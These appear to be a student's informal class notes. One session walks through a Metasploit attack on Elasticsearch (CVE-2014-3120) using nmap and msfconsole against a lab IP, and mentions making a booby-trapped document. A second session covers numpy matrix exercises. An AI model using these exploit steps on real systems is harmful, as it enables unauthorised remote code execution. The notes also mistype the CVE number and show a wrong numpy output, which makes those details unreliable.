Hardware security: (2019.11.12)(Fly Dragon)

  ex. CPU
  >>Apache is an open source
  
  Big Problem: Remote Code Execution
  -------------------------------------------
  Words attack:
  Use metasploit to make a bad "Words" for others to download
  -------------------------------------------
  TODAY WORKS:
  USING KALI LINUX TO ATTACK METASPLOIT
  --------------------------
  Penetrstion Test (PT)
  > COMMAND 'nmap': find the open service
    -> nmap.org
    -> nmap.org/book
  > metasploit
    -> https://zh.wikipedia.org/wiki/Metasploit
  > msfconsole
  ----------------------------------------------------
  CVE Details 查漏洞
  
  ----------------------------------------------------
  make a folder in others' C:/
  STEPs:
  >tool: msfconsole
  >commands: search elasticsearch
             -> seach CVE-2014-3120
             -> use exploit/elasticsearch/script_mvel_rce 
                (strings after the word "use" is not a command; you can find it after entering the command "search CVE-2017-3120")
             -> show options
             -> set RHOST 10.0.2.4 (attacked ip)
             -> exploit
             -> then you can make the folder on the target compture!
  
  command:
  PWD -> to know where you are
  
==========================================================
Black Friday (2019.11.26)

Github:
(https://github.com/HappyHackingHigh/AI4high)
=> 找簡報
四大科學:
理論科學、實驗科學、xxxx、資訊科學

Julia is going to replace Python

Numpy practice:
> ar=np.arange(1,5)  建立一個 1 到 5 的矩陣:
  -> y = np.arange(2,10)
     y
         
     array([2, 3, 4, 5, 6, 7, 8, 9])
         
> ar=np.array   建一個矩陣:
  -> ar = np.array([[2,3,4],[9,8,7],[11,12,13]])
  
     array([2, 3, 4, 5, 6, 7, 8, 9])
     
Work: 用 Numpy 線性代數解
 例: {3x+y-2z = 6
      2x+6y-3 = 5
      5x+6y+7z = 7
  
     ([[3,1,-2]        ([x]         ([6]
       [2,6,-3]   X     [y]    =     [5]
       [5,6,7]])        [z])         [7])
       
       
   



